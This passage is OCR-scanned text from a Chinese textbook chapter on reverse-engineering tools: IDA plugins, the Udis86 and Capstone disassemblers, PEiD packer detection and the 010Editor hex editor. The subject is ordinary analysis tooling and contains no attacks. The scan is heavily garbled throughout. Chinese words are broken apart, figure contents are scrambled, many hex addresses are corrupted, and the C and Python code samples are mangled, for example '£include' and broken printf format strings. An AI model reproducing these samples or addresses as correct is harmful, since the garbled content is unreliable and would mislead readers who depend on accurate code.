加 up j GpBmpEncoder:WriteHeader(ColorPalette const )+109 jmp short loc 70E18266 




















Help 














图 3-5 xrefs 的 查找 功能 


6. 插件 功能 
IDA 提供 了 SDK 插件 开发 接口 ,用 户 能 够 扩展 逆向 分 析 功 能 ,将 编译 好 的 IDA. 插件 
复制 到 插件 目录 plugins 下 ,如 图 3-6 所 示 ,插件 是 扩展 名 为 PLW 的 文件 ,重启 IDA 后 即 


可 使 用 插件 。 

HIRD! plugins - NN 
ED: oc 5 «e 
© » - t b» Sse » WRAD) ^ IDA » IDAPro65 » plugins viO] | RR'plugins" P 

— E zw > 修改 日 期 am ^ 86 
* L met2dbg.p64 2014/1/162040 — P64 XV T8 
BTE DD met2dbg.plw 2014/1/16 20:40 PLW 文件 
mam D nest pet 2014/1/162039 — p64 文件 
di 最 访问 的 位 置 D nextfiplw. 2014/1/16 20:39 — PLW 文件 | 
Dpdb.p64 2014/1/16 20:40 P64 文件 
mixes L1 pdb.plw 2014/1/16 20:40 — PLW 文件 
Bua D pin user.p64 2014/1/16 2040 — P6A 文件 
Eme D pin.user.plw 2014/1/16 20:40 — PLW 文件 Met ENDS 
xs D plugins.cfg 2013/12/33 18:30 CFG 文件 
d TE D python.p64 2013/12/13 2143 。 P64 文件 
Das L3 pythonplw 2013/12/13 21:43 PLW 文件 
kam LÀ replay_user.p64 2014/1/16 20:39 P64 文件 
L3 replay user.plw 2014/1/16 20:39 PLW 文件 
i rei C) [O samaout.p64 2014/1/16 20:39 — P64 文件 
ca FBR (D) [D] samaoutplw 2014/1/162039 — PLW 文件 
ca 专题 研究 (E) 口 smartdec.p64. 2014/8/18 8:16 P64 文件 
ca 数据 区 (F) D smartdec.plw 2014/8/18 8:16 PIW 文 件 、 
ca eR (G) ~ < > 
86 个 项 目 Bs 
图 3-6 IDA 插件 


笔者 通过 编写 IDA 插件 分 析 提 取 了 函数 的 起 始 地 址 和 终止 地 址 ,将 结果 存储 到 文本 
文件 中 ,如 图 3-7 Bron , 左 侧 是 函数 的 起 `. 止 地 址 信息 数据 , 右 侧 是 函数 覆盖 的 代码 基本 块 
信息 数据 。 文 本 内 4 列 数据 分 别 为 起 始 地 址 、 终 止 地 址 、 动 态 库 名 称 和 动态 库 基地 址 、 函 
数 名 。 通 过 分 析 发 现 函数 内 的 代码 并 非 连续 分 布 , 且 存在 多 个 函数 共用 同一 部 分 基本 块 
代码 的 情况 ,这 是 编译 器 优化 导致 的 结果 ,另外 ,函数 可 能 有 多 个 函数 出 口 。 

笔者 还 通过 IDA. 插件 提取 基本 块 数据 ,根据 基本 块 之 间 的 跳 转 关系 ,计算 出 基本 块 





&diplus. dL1 0x12020000 
Dxdataa320 Dx4afaad07 gdiplus. dll Ox42620000) 
Dxdafaadü- Oxdataad2d gdiplus. dL 1 242620000) 


xdafaa432 Drdafaa439 gdiplus. dl 1-Ox4ae:0000 


Crdafaat l= Otafa2740 gdiplus.dl]-Drieet0000 
Uxdafaaj45 UxdafaaTSb sdiplus. dll 7x4ae30000. 
Ediplus, dL1 x4ae30000) 
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-cNEN 


a FuncRange adiplus.dll 0x42e30000.1xt -记事 本 
XH RED EUO SEN) BD 

0rdafaal88 Ox4afaa2fb sdiplus. dll Ox4seG0D00! xth 90dssClosestRotationFac ^ 
ordafsa300 Üxiafaadeb gdiplus. dll _Dxdae30D00!_xth_ Jon90DegreeJTanofornat: 
ordafaa3z0 Oa4afa2407 gdiplus. dl] OrdaoS000 

rdafaad0c Dx4afaad2d sdiplus all-0zdas30D0 
Dr4afaa435 Dr4afaz429 gdiplus. dll Or4ze30000! mth} 
j0r4afaa49= Dx4afas599 gdiplus. dl1]_Dx4ae90000!_mth_Intellola24 

rdafaa595 0x4afas6]2 ediplus. dl]-Dxdac800001 mth FcldPointSizeResclutior 
0zdafaa617 0xdafas6cb gdiplus.dll Oxia920000! 7 

(Oxdafaa&dO Ox4afaaT719 gdiplus. dl Ordee3000! 
Oxdafaa?le Ox4afa2740 gdiplus. dL]. Dx4ae00000! a 


Oxdafaaj45 ÜrdafaeT5b sdiplus. dll Ox4ee30001 
ERES. vioc: 








xdafaa760 UxdafaTC5 zdiplus, dll CxdaegUD0 
Oxdafbiéla Ox4afb34ls ediplus. dll Crdaed0DQ 


| fec IritializeüO add block 
tscInitlalize add block 
fsc TnitializeO add block 
sc RenoveDupst4 


Cxdafaa7a 0xdafaa8ab Ediplus. dl1l_ Ordae30000!_fsc_Ranove 


J0rdafbda0d Dadafbdasb gdiplus. dL] Oxdaed000 
DxdafaaZbO Dx4afaa932 gdiplus. dll 042630000! fsc Oversea] «Qu! EL 


0rdafbaa9a Dx4afbda3f gdiplus. dl] Or4ae5000 
0r4afbda20 Dx4afbdaSb sdiplus. dl 1-Ox4ae3000, 
Ordafaa76a 0xd4afaa8ab sdiplus, dL] Dr 和 ae9000 
Ürdafeaib) 0x4afaa952 gdiplus. dll 0x4ae90000! foc 0yerScal eDutlineg8 
ordafaa987 DxdafaabcT gdiplus, dll Oxdao30000! fcc, CalcGraylaphl2 
in|] Bdataacdà Oxkafusddo ediplus. dL1-2x4ae200001 FindExtrerads 

rdafaad50 Da4afazic0 gdiplus. dl 1 Dr4ae0000! Tvaluats?plins3? B 
0x4afaaf55 Dx4afab3af gdiplus. dl] Or4ae90000! fsc Nea sureb lyphð28 
0xdafab3e4 Oxdafabëda sdiplua. dl Ozdee90000!_ fac FillGlyphl20 
ordafaba4f Dxdafab9c8 sdiplus, dl Oxdao3000! ciac Claceliy 
Drdafab3ca OxÁnfabaé? ediplus. dll Ordee?0000! siac DoDffetIabieagii 
rdafaba68 Qdafabacü gdiplus. dL]. Ordae30000! -sfac BetDataPtri24. 
0x4afabac5 Ox4afabach sdiplus, dl] 0146300001 —-fac orputelinkownl nde 








rin abode Urlsfebaco fdislus dli DtlesiUUD!-sfac Dotto 
0xdafabae5 Odafabacb sdipluc. dll Oxao30000! zfac CorputeUrkcenIn: 
0zdafabaan Dx4afabaf2 gdiplus. dll -rdae30000| 


rdafabb82 Oxtafabbbc gdiplus. dL 1-Od«es0000! sfac Lorputelnderóil 
< å y LEM 


图 3-7 IDA 插件 提取 函数 信息 


的 后 必 经 节点 ,如 图 3-8 所 示 , 左 侧 是 基本 块 信息 ,包括 开始 地 址 、 结 束 地 址 、 函 数 的 基本 
块 数 目 、 基 本 块 的 指令 数目 , 右 侧 是 基本 块 的 后 必 经 节点 信息 ,以 (起 始 地 址 ,结束 地 址 ) 代 
表 一 个 基本 块 ,(A) 三 三 二 (B) 表 示 基 本 块 A 的 后 必 经 节点 是 基本 块 B, 如 果 是 (0,0) 表 示 
函数 出 口 ,其 他 数值 表示 基本 块 的 起 始 和 结束 地 址 。 后 必 经 节点 可 用 于 动态 分 析 过 程 中 
控制 流 分 析 的 控制 范围 计算 。 


| iBesicBlock gdiplusd.. ~ = BEI 
OZAN RED MLO mz) EWH 
Dxdacb54at Dxdacb54a0 9 2 ^ 
Oxdaebo4dd Üxdaebb4dd 9 1 E 
Dxdaeb5428 Dxdaeo55Db | 15 
Dxdaeb5511 Dx4aeb553d 1 18 
0xdacb5545 Dxdaeb557f 1 24 
Dx4aeb5537 Dx4aeb55ba 1 22 
Oxdaeb55c5 Dxdaeb55d3 13 9 
Oxdaebbbdb Dxdaeo55d5 13 1 
Dxd4achb5643 Dxdaeb56db 13 4 
0x4acb55s0 Dx4acb55s6 13 2 
Ox4aebbbeS Dxdaeb55ea 13 2 
xdaeb55d7 Oxdaeo55de 13 2 
Oxdaebbbac Dx4aeb55f2 13 2 
Dxdacb5584 Dxdaob5605 13 6 
Oxaeb5607 Dxdaeb56De 13 2 
Dxdaeb5610 Dxdaeb5617 13 3 
Oxdaeb5619 Dxdaeb562e 13 5 
0xdach5624 Dxdaeb563a 13 3 
Dx4aeb563c Dx4aeb5642 13 3 
Oxdaeb5653 Dxdaeb565b 5 3 
0xdagb565d Dxdaeb5663 b 2 
DxdacbSEAS Dx4aeb5674 5 5 


























X ew) ELO GEH) FMH 


(0x4aobE155, Ox4a0b5160) ==> (0x0, 0x0) 
(Dx4aeb5166, Ox4aeb5179) ==> (0x0, 0x0) 
(0x4ae05181, Ox4aed51a0) ==> (0x0, 0x0)| 
(0x4aeb51a8, Ox4aeb51b1) ==> (Or4aeb5 li daeb51cl) 
(Dx4acb51h3, 0xdacb5lb7)==>(0xdaeb5 北 的 0k4aeb5lc1 
(0xd4aeb51b9, 0x4aeb51lbc)--~>(0xdasb515D Dxdaeb51c1) 
(Dxdaeb51c0, 0x4aeb51c1) ==> (0x0, 0x0) 

(Oxdaco5 lbe, Oxdaeb5 Ibe) ==> (Ordaeb5 lco, Odaebs 1c} 
0xdaeh51eG, 0x4aph51d2) ==> (Oxdaob5 lel, Ordacb5lo?, 
(0x4aeb51d4, 0x4aeb51d9) ==> (Oxdaeb5lel, 0x4acb51e2) 
>(0xdaeb5lel Ox4aeb51e2) 

? (0x0, 0x0) 
> (0rdaeb5 lel, Ox4aeb51e2) 
> (0xdaob51£d, 0zdacb51fo) 





(0x4aeb51da, 0x4aebbldd) 
[| (UxdaeoS 1e1, 0x4aeb5le: 
(0x4aeb5ldf, Oxdaeb5ld: 
(0xdaob51oa 0xdacb51: 
(Dxdaeb5126, 0xdzeb51ia)==>(0x4aeb51fd Ox4aeb51fe) 


> (0xdaeb511d, Ox4aeb51fe) 

> (0x0, 0x0) 

> (Oxdaeb5219, OxdacbS21a) 

> (Oxdaeb5219, Ox4aeb521a) 
(0xqaeb5218, 0xdaeb5218) ==> (Ordaeb5219, Oxdaeb521a) 
《0xdaeb5219, 0x4aeb521a) ==> (0x0, 0xD) | 


< > 


(0xdaeb51fcy 0xdaeb51:. 
(0xdaeb51fc, Oxdaeb5lie 
(0xdaeb5206, 0xdaebS21t 
(Dx4aeb5212, 0x4aeb5216) 











图 3-8 IDA 插件 获取 基本 块 信息 


IDA 是 功能 较为 完整 的 逆向 分 析 工 具 , 主 要 应 用 于 静态 代码 反 汇 编 , 同 时 也 支持 动 
态 调试 ,支持 插件 扩展 ,功能 较 多 ,无 法 逐一 介绍 ,具体 可 参阅 官方 网 站 https://www. 
hex-rays. com/index. shtml 及 《IDA Pro 权威 指南 ) 一 书 . 有 关 IDA 的 插件 开发 可 参考 
IDA Plug-in Writing in C/C++ 。 


31.2 Udis86 
Udis86 是 一 款 开 源 反 汇 编 库 ,支持 x86/x86-64 架构 ,支持 SSE, SSE2. SSE3 等 多 媒 
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体 扩展 指令 集 , 由 Vivek Thampi 开发 和 维护 ,从 代码 的 修改 记录 推断 其 起 源 于 2009 年 
或 者 更 早 。 下 面 从 编程 接口 和 开源 工具 的 使 用 两 方面 介绍 Udis86 的 功能 。 

1. Udis86 开发 接口 

Udis86 提供 了 一 套 反 汇编 的 第 三 方 库 ,用 户 可 自行 编写 代码 进行 扩展 ,Udis86 库 提 
供 了 C/C++ 接口 ,代码 用 例如 图 3-9 所 示 ,在 进行 了 初始 化 结构 、 设 置 模式 (16 位 、32 位 
或 者 64 位 ) ,设置 语法 、 设 置 反 汇编 的 十 六 进 制 机 器 码 等 基本 操作 之 后 ,执行 反 汇 编 函 数 ， 
最 终 得 到 反 汇编 结 果 。 





1  £include <stdio.h> 
2  £include «udis86.h» 
3 int main() 
4 t 
5 // EX 
6 ud t UdObj; 
7 // TRKE, 
8 ud_init (EUdObj); 
9 ud set mode(&UdObj , 32); 
10 ud set syntax(&UdObj, UD SYN INTEL): 
u // 设置 输入 的 16 进 制 机 器 码 
i2 ud set input buffer(&UdObj, (uint8 t*)pHexCode, 16); 
i3 // 热 行 反 汇编 翻译 
14 ud disassemble (&UdObj); 
15 printf("MXt$s Wn", ud insn asm(&UdObj)); 
16 ) 
struct ud t { 

char *asm buf; /汇编 指令 字符 

struct ud_operand operand[3]; 1// 操 作 数 

enum ud_mnemonic_code mnemonic; l 指令 宏 定义 

} 











图 3-9 Udis86 开发 示例 


反 汇 编 结 果 存储 在 结构 体 类 型 为 ud_t 的 变量 UdObj 中 ,图 3-9 列 出 了 ud_t 的 几 个 
关键 数据 结构 。 其 中 asm. buf 是 以 字符 串 形式 显示 的 指令 ,如 “move ax，ebx”;operand[3] 
是 3 个 操作 数 , 该 结构 包含 操作 数 类 型 (寄存 器 、 内 存 、 立 即 数 等 )、 操 作 数 大 小 、 操 作 数 地 
址 等 ;mnemonic 记录 的 是 指令 对 应 的 宏 定义 ,通过 switch 可 以 对 各 个 指令 分 别 解析 , 解 
析 过 程 中 可 进行 污点 传播 计算 、 首 向 切片 .符号 执行 等 各 种 功能 上 的 扩展 ,如 图 3-10 
所 示 。 

Udis86 的 指令 解析 是 针对 静态 指令 ,比如 mov eax, ebx, 解 析 过 程 当 中 无 eax 和 ebx 
的 值 ,相关 的 结构 也 不 会 存储 这 两 个 寄存 器 的 值 ,在 进行 动态 分 析 的 时 候 需 要 结合 外 部 结 
构 记 录 寄 存 器 、 内 存 的 值 。 再 比如 push eax,movsd 这 类 具有 隐 含 操作 数 的 指令 ,operand[3] 
这 一 结构 体 数 组 也 会 缺失 具体 的 操作 地 址 信息 ,需要 结合 esp、edi、esi 寄存 器 的 值 获取 真 
实 的 指令 操作 地 址 。 

2. 基于 Udis86 的 反 汇编 工具 udcli 

udcli 是 基于 Udis86 的 反 汇 编 工 具 , 集 成 在 Udis86 项 目 里 ,通过 命令 行 可 快速 实现 
反 汇编 。Udis86 同时 支持 16 位 模式 、32 位 模式 以 及 64 位 模式 的 反 汇编 。 如 图 3-11 所 
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ZR ,分 别 采 用 64 位 .32 位 、16 位 的 模式 ,对 机 器 码 “54 56 c3” 进 行 了 反 汇 编 。 同 样 的 机 器 
码 在 不 同 字 长 的 处 理 器 架构 下 指令 意义 大 体 相 似 , 只 是 处 理 的 寄存 器 字 长 不 同 而 已 。 


switch(pud->mnemonic){ 








case UD_Imov: 
case UD Ipush: 
case UD Ipop: 





case UD Ipushfd: 
1 





//mov a -> aa 
case UD Imovsx: 
//mov a -> 9a 
case UD Imovzx: 





1 
case UD Ibsf: 
{ 





case UD Ibswap: 
(//| abcd - > dcba 
case UD Ixchg: 








case UD Ilea: 





case UD Idec: — // the same with inc 
case UD Iinc: 
case UD Ineg: 





t 
case UD Inot: 








图 3-10 Udis86 反 汇 编 指令 解析 





aota@aota-Optiplex-990:~$ echo "54 56 c3" | udcli -64 -x 
0000000000000000 54 push rsp 
0000000000000001 56 push rsi 
0000000000000002 c3 

aotaQaota-OptiPlex-990:-$ echo "54. EE c3" | udcli -32 -x 








0000000000000000 54 push esp 
0000000000000001 56 push esi 
0000000000000002 c3 ret 
aotagaota-OptiPlex-990:-$ echo "sa 56 c3" | udcli -16 -x 
[0000000000000000 54 push sp 
0000000000000001 56 push si 
0000000000000002 c3 ret 





图 3-11 udcli 反 汇编 示例 


与 IDA 相 比 ,Udis86 功能 更 加 简单 ,更 专注 于 反 汇 编 指令 分 析 , 缺 乏 上 层 的 符号 语 
义 信 息 , 其 开源 和 动态 库 的 特性 更 加 便于 用 户 进 行 开发 和 扩展 。Udis86 的 开源 代码 和 更 
多 相关 资料 可 从 https://github. com/vmt/udis86 获取 。 


3.13 Capstone 


Capstone 是 一 款 开 源 , 轻 量 级 、 多 平台 \ 多 架构 反 汇 编 框 架 , 支 持 x86 、x86-64、ARM 、 
ARM64,MIPS, PowerPC 等 架构 ,支持 Windows, Linux, Mac OS 操作 系统 。Capstone 是 
由 Nguyen Anh Quynh 于 2013 年 创建 的 项 目 ,至 今 仍 在 持续 更 新 中 。 下 面 从 框架 接口 
和 在 线 反 汇编 两 个 方面 介绍 Capstone 功能 。 
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1. Python 开发 接口 

Capstone 的 主要 功能 是 提供 一 套 反 汇编 框架 ,核心 是 反 汇 编 引 擎 , 提供 扩展 接口 。 
以 Python 开发 接口 为 例 , 图 3-12 是 示例 代码 ,首先 导入 Capstone 的 Python 包 , 设 置 反 
汇编 引擎 的 架构 等 参数 ,如 图 3-12 中 的 ARCH_X86 架构 ,CS_MODE 32 模式 ,然后 对 十 
六 进 制 机 器 码 进行 顺序 扫描 ,取出 逐条 指令 进行 反 汇编 ,并 输出 反 汇 编 结 果 。 





aotagaota-OptiPlex-990:-$ cat test.py 
from capstone import * 


code = "\x55\x48\x8b\x05\xb3\x13\x00\x00\xc3" 


md = Cs(CS ARCH X86, CS MODE 32) 


for i in md.disasm(code, 0x1000): 
print "OxXx:VtXsVtXs" X(i.address, i.mnemonic, i.op str) 





图 3-12 Capstone 的 Python 开发 用 例 


图 3-13 是 运行 开发 用 例 输出 的 反 汇编 结果 ,包括 指令 对 应 的 偏 移 位 置 、 指 令 、 指 令 的 
操作 数 这 些 基本 反 汇 编 信 息 。 





Jaota@aota-Optiplex-990:~$ python test.py 
|0x1000: push ebp 








0x1001: dec eax 
|0x1002: mov eax, dword ptr [0x13b3] 
(0x1008: ret 





图 3-13 Capstone 反 汇 编 结 果 


2. C 语言 开发 接口 

此 外 ,Capstone 还 提供 C 语言 开发 接口 ,具体 可 参照 Capstone 源码 目录 下 的 test 文 
件 夹 中 的 模板 案例 以 及 docs 文件 夹 下 的 pdf 参考 文档 。 使 用 C 语言 接口 开发 在 性 能 上 
要 优 于 Python, 与 Udis86 类 似 ,Capstone 也 是 针对 静态 代码 进行 反 汇 编 ,首先 使 用 cs_ 
open 接口 打开 资源 句柄 ,并 配置 CPU 架构 参数 ,可 供 选 择 的 有 x86, ARM, MIPS, XCore 
等 ,其 中 x86 支持 16 位 、32 (2,64 位 ,汇编 指令 集 支持 Intel 和 AT&T, 默 认 情况 下 使 用 
Intel 汇编 ,通过 cs option 接口 可 以 设置 成 AT GT. iL 48: ARM 支持 大 端 .小 端 .Thumb 
指令 集 ;MIPS 同样 区 分 和 支持 32 位 、64 位 的 大 端 , 小 端 格式 的 指令 集 。 然 后 使 用 cs_ 
diasm 接口 进行 反 汇编 ,参数 包括 句柄 、 机 器 码 缓冲 区 、 机 器 码 长 度 和 设置 的 指令 地 址 、 返 
回 的 反 汇编 结果 。 如 图 3-14 所 示 ,上 部 分 别 使 用 Intel 汇编 指令 和 ATT 汇编 指令 输出 
反 汇 编 结果 ,下 部 是 对 应 的 实例 代码 ,其 中 Intel 指令 的 目的 操作 数 在 左 , 源 操作 数 在 右 ， 
而 AT&T 则 相反 , 源 操作 数 在 左 , 目 的 操作 数 在 右 。 

Capstone 基于 C 语言 开发 ,提供 C/C++ 、Python、Java、Perl 等 接口 ,具备 开放 接口 
好 、 轻 量 级 性 能 高 等 特点 。 目 前 基于 Capstone 进行 开发 的 产品 被 应 用 于 恶意 软件 自动 
分 析 、 道 向 工程 等 领域 。 程 序 源码 和 更 多 资料 可 从 Capstone 的 官方 网 站 http://www. 
capstone-engine. org/index. html 获取 。 
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aota@aota-Optiplex-990:~/capstone-3.0.4/tests$ ./Mytest 


6x1666: lea ecx, dword ptr [edx + esi + 8] 

0x1004: add eax, ebx Intel 汇编 指令 
0x1006: add esi, 0x1234 
aotagaota-OptiPlex-990:-/capstone-3.0.4/testsS$ ./Mytest 1 

60x1000: leal 8(Xedx, Xesi), Xecx 

6x1664: addl Xebx, Xeax } AT&T 汇编 指令 
6x1666: addl $0x1234, Xesi 


aotagaota-OptiPlex-990:-/capstone-3.0.4/tests$ 





int main(int argc, char *argv[]) 
at 


csh handle; 
cs insn *insn; 
size t count, j; 
cs open(CS ARCH X86, CS MODE 32, &handle); 
if (argc » 1) 

Cs option(handle, CS OPT SYNTAX, CS OPT SYNTAX ATT); 
count = cs disasm(handle, X86 CODE32, sizeof(X86 CODE32), 0x1000, 0, &insn); 
è if (count) { 
F for (j = 6; j < count; j++) { 

printf ("Ox%"PRIX64":\t%s\t\t%s\n", 

insn[j].address, insn[j].mnemonic, insn[j].op str); 


cs free(insn, count); 


cs close(&handle) ; 





Æ 3-14 Capstone 的 C 语言 接口 实例 


314 PED 


PEiD 是 Windows 平台 下 常用 的 PE 文件 格式 分 析 工 具 , 用 于 提取 exe, dllsys 等 标 
准 可 执行 程序 的 文件 结构 ,也 常用 于 检测 程序 加 壳 。PEiD 工具 已 停止 了 更 新 ,本 书 以 
v0. 9. 5 版 本 为 例 进行 介绍 ,该 版 本 更 新 于 2008 年 。 

1. PE 格式 信息 提取 功能 

PEiD 的 主要 功能 是 PE 文件 格式 信息 提取 ,如 图 3-15 所 示 , 分 析 人 员 可 以 通过 设置 
PE 文件 路 径 , 自 动 提取 PE 文件 相关 信息 ,也 可 以 通过 指定 进程 ,提取 进程 对 应 文件 的 
PE 格式 数据 ,这 些 信 息 包 括 程序 人 口 点 Entrypoint, EP 节 信 息 EP Section .连接 器 版 本 
信息 Linker Info、 子 系统 类 型 Subsystem。 图 中 的 Microsoft Visual C++ 8. 0[ Debug ]J 
编译 器 版 本 信息 ,由 于 PEiD 长 期 未 更 新 ,无 法 识别 Visual Studio 2010 等 高 版 本 编译 器 
编译 出 的 PE 文件 。 另 外 ,PEiD 支持 分 析 的 文件 格式 只 是 32 位 的 exe 程序 和 dll 动态 
Je ,无 法 解析 64 位 PE 文件 。 

2. 插件 扩展 与 脱 壳 处 理 

PEiD 的 优点 是 支持 470 种 加 壳 特征 信息 的 识别 ,支持 数 十 种 插件 扩展 ,插件 以 动态 
库 dll 的 形式 存储 在 plugins 目录 下 ,通过 插件 实现 常用 加 过 类 型 的 脱 过 修复 CRC 校 验 
等 功能 。 如 图 3-16 所 示 ,PEiD 检测 出 目标 加 壳 类 型 为 UPX, 使 用 插件 Unpacker for 
UPX 进行 脱党 处理 后 ,得 到 脱 壳 后 的 程序 unpacked. exe. 

PEiD 最 大 的 功能 是 提取 PE 格式 信息 和 检测 程序 加 壳 , 脱 壳 需 要 辅助 插件 ,目前 可 
从 第 三 方 论坛 ,如 看 雪 论 坛 http://bbs. pediy. com/showthread. php? t— 152454 获取 相 
关 工 具 。 类 似 的 工具 还 有 LoadPE, 其 功能 与 PEiD 相似 ,支持 64 位 PE 文件 的 解析 ,软件 
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图 3-16 PEiD 插件 脱 壳 
可 从 相关 论坛 获取 。 
315 010Editor 


010Editor 是 SweetScape 公司 推出 的 一 款 商 业 付费 编辑 器 软件 ,提供 30 天 免费 试用 
期 。010Editor 从 2003 年 发 展 至 今 ,支持 32 位 和 64 位 的 Windows、Linux 及 Mac OS 操 
作 系 统 平台 ,以 下 介绍 具体 的 文件 编辑 和 文件 解析 功能 。 

1. 文件 编辑 功能 

文件 编辑 是 010Editor 的 基础 功能 ,编辑 方式 支持 文本 编辑 、 二 进 制 编辑 以 及 十 六 进 
H Hex 等 编辑 模式 。 如 图 3-17 所 示 , 左 图 为 文本 方式 的 编辑 模式 ,与 记事 本 打开 文件 类 
似 , 需 要 注意 选择 字符 集 编码 方式 ,否则 可 能 出 现 乱码 的 情况 ,支持 ASCI ANSI, 
EBCDIC, UTF-8, Unicode, Chinese-Simplified 等 大 概 20 种 字符 集 ; 右 图 为 十 六 进 制 
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Hex 的 编辑 方式 ,显示 的 信息 包括 文件 偏 移 量 .Hex 编码 .字符 集 的 编码 显示 ,采用 的 字 
符 集 是 可 以 进行 选择 设置 的 。 
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图 3-17 文件 编辑 


ozohz 6D 75 SF 69 60 61 67 65 5F 70 61 74 6B 20 2D 6D 
0030h: 20 ED es eD ef 72 79 SE 73 69 7A 65 20 2D 53 &4 
Coton: 72 €f €D 20 4D €B 69 73 €F 66 73 SF 6F 75 74 70 
Coson: 75 74 2F 63 73 £? 20 2D 43 6F GE CE 69 67 66 69 s 
cosan: 6C 65 20 71 65 6D 75 SE 63 6F 6E 66 69 67 SP 70 
0070h: € 74 es 20 20 74 72 61 63 6$ 70 6 74 6s 20 7l 
t coson: 4$ €D 75 SF 7472 61 74 6$ SF 70 41 74 $B 20 2D 
Coson: 6D er cE 69 74 CF 72 20 73 74 64 €s 6F OD DÀ op 
eaxohz OX DE CE D7 F7 BF EC Ds Ds OD OR ED 69 67 72 €. 


cho i qen ERHENG. DOBOh; 74 65 20 22 65 78 65 63 3A 20 67 7A 69 70 20 2D 
image path s qessR BeNi E COCOR: €3 20 3120 73 6E € 70 73 68 SF 7$ SF 79 &1 74 
: BeakROrr moms Conon: €8 2f 1 7A 22 OD OX OD oA OD OL SF EC DS D5 CE 


susput.iso : MIDE Coton: F4 BE AF OD OR 71 65 6D 75 SF 66 75 6C 6C 5F 70 
n i qemuBHMRMEANUNTH. Ei 。 00FOh: 61 74 69 20 20 68 64 61 20 71 6b 6D 75 5E 63 €D 
shapsho: Pash gz" snapshot 0100n: 61 67 6$ SF 70 6l 74 68 20 2D 6D 20 6D €» 6D er 

pott Miaherscem S ARR Oli0Bi 72 79 SF 73 6$ 7A 65 20 2D 63 64 72 SF 6D 20 eD 

Ois0hi 6b 69 73 GF && 75 SF 6F 75 74 70 25 74 2E 69 73 





010Editor 同样 具备 基础 编辑 器 具有 的 复制 . 剪 切 粘贴. 查找 、 替 换 的 基础 功能 。 查 
找 方式 支持 十 六 进 制 的 Hex 格式 字符 ,也 支持 Text, ASCI 的 文本 格式 字符 串 等 ,如 
图 3-18 所 示 。 编 辑 修改 之 后 可 保存 修改 后 的 文件 。 





X Find Hex Bytes: ^ 2D 


^t 


Options ^ 





X Replace Hex Bytes: + 








-ef 


Replace All 











x|rind — ascu: ae -| 


Options + 











X [Replace ASCII: ~ ^| 





Replace All 





图 3-18 查找 替换 
2. 范本 分 析 功 能 


范本 分 析 是 010Editor 的 一 大 特色 功能 ,用 于 对 文件 格式 进行 解析 ,提取 文件 的 格式 


字段 内 容 。 范 本 分 析 需 要 范本 文件 Template. bt 的 支持 .010Editor 官方 网 站 提供 了 一 些 
常用 文件 格式 的 范本 ,包括 avi, bmp.jpeg.pdf.zip.exe,dex 等 。 用 户 可 以 根据 文件 格式 
编写 自己 的 范本 文件 用 于 扩展 ,通过 菜单 栏 编辑 范本 清单 可 以 添加 、 删 除 范本 ,如 图 3-19 


所 示 。 


Edit Anything 





Tenplates: 





BMP Template 
ZIP Template 

WAV Template 
JPEG Template 





ev 
Delete 


cele 








Tesplate Options 





Nane: EMP Tenplate 


E visible 








File Nane: [ (STBIFLATEDIR) VEIPT enplate.bt 


Bl 








Mask: n 








图 3-19 添加 范本 格式 


EZ] Run on Load [] Show Editor on Load 
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图 3-20 为 bmp 图 片 范本 分 析 的 样 例 。 提 取 的 信息 包括 字段 名 (字段 的 含义 、 类 型 ， 
该 信息 源 自 于 范本 文件 )、. 字 段 的 值 . 字 段 在 文件 中 的 偏 移 .字段 的 长 度 。 从 解析 结果 来 
看 ,该 bmp 图 片 宽度 为 865 像素 ,高 度 为 217 像素 ,像素 的 矩阵 排列 在 BITMAPLINE 结 
构 中 ,每 一 个 像素 点 的 RGB 值 可 以 从 RGBTRIPLE colors 数组 中 进行 查看 和 编辑 修改 。 


Tenplate Results — DIETenplate bt 








Nane Value Start Size Color Comment 
4 struct BITHAPFILEWEADER bafh oh Eh Ie Pe 
4 CHAR bfType[2] m ok zh Jc m 
[M4 Oh 1h Te Pe 
"x 1h 1h Te Bg 
563386 2h 4h LN S 
0 6h Jc c 
0 8h 2h Pe Pe 
54 4h Pe Bg 
Ih 28h LS 
40 外 Te Bg: 
865 12h 4h Te Ee 
zw 16h 4h Te Bg 
1 1Ah 2h Jc — BEN 
24 ich 2h Fe Be 
0 1Eh 4h Pe Pe 
o 4h Ye Ee 
NG biXPelsPereter 2835 26h 4h T; Fel 
LONG bi Fel sPerleter 2835 2Ah 4h Te Be 
DWORD biClrUsed 0 2E 4h LN S 
DWORD biClrlaportant o 32h 4h LE S 
4 struct BIDINPLINE lines[217] 36h 59664h Te Bg 
4 struct BITMAPLINE lines[0] 36h hah Te Bg: 
4 struct RGBTRIPLE colors [865] 36h J23h LN S 
4 struct RGETRIPLE colors[0] — 1534057 36h 3h Te Be 
VBYTE rgbBlu. 87 36h 1h Te Bg: 
TE ri 64 3m 1h Te e 
VBYTE rebi 83 36h 1h LN S 
4 struct RGBTRIPLE colors[1]  #E9E2EB 39h 3h Fg Bg 
VBYTE 235 30h 1h Fe Bg 
226 EN 1h Te Be 
VBYTE rgbRed 233 3 1h LES 
图 3-20 bmp 文件 范本 分 析 
3. 脚本 分 析 功 能 


脚本 分 析 也 是 010Editor 的 一 项 高 级 功能 ,需要 脚本 文件 的 支持 。010Editor 内 置 了 
如 图 3-21 所 示 的 5 个 脚本 。 其 中 ,MultiplePaste 脚本 用 于 重复 性 粘贴 ,例如 需要 在 文件 
中 添加 500 个 0x90 字符 ,可 以 使 用 该 脚本 ;IsASCII 脚本 用 于 判断 文件 是 否 为 纯 ASCH 
编码 ,对 于 非 ASCII 编码 文件 会 提示 第 一 个 非 ASCII 编码 的 字符 ;Randomize 脚本 能 够 
按 给 定 的 随机 数 范围 对 文件 内 容 进 行 随机 化 ,可 用 于 Fuzz 领域 ;JoinFile 脚本 可 以 将 同 
一 文件 夹 下 的 多 个 文件 进行 合并 ;SplitFile 脚本 能 够 按 给 定 的 文件 大 小 ,将 大 文件 拆 成 等 





大 小 的 文件 分 片 。 
名 称 修改 日 期 m X^ 
O MultiplePaste.isc 2013/3/20 16:57 ^ 010 Editor Script File 1KB 
O sascittsc 2013/3/20 16:57 。 010 Editor Script File 2 KB 
L] Randomize.1sc 2013/3/20 16:57 。 010 Editor Script File 2KB 
D Joinfile.1sc 2013/3/20 16:57 — 010 Editor Script File 3KB 
O splitFile1sc 2013/3/20 16:57 — 010 Editor Script File 5 KB 





图 3-21 010Editor 内 置 脚本 


4. 磁盘 编辑 功能 
磁盘 编辑 分 析 也 是 010Editor 的 一 项 高 级 功能 ,这 是 普通 编辑 器 所 不 具备 的 ,支持 硬 
盘 设备 .USB 设备 .CD-ROM 等 。 磁 盘 编 辑 分 析 需 要 具备 较 高 的 专业 知识 ,需要 熟悉 磁 
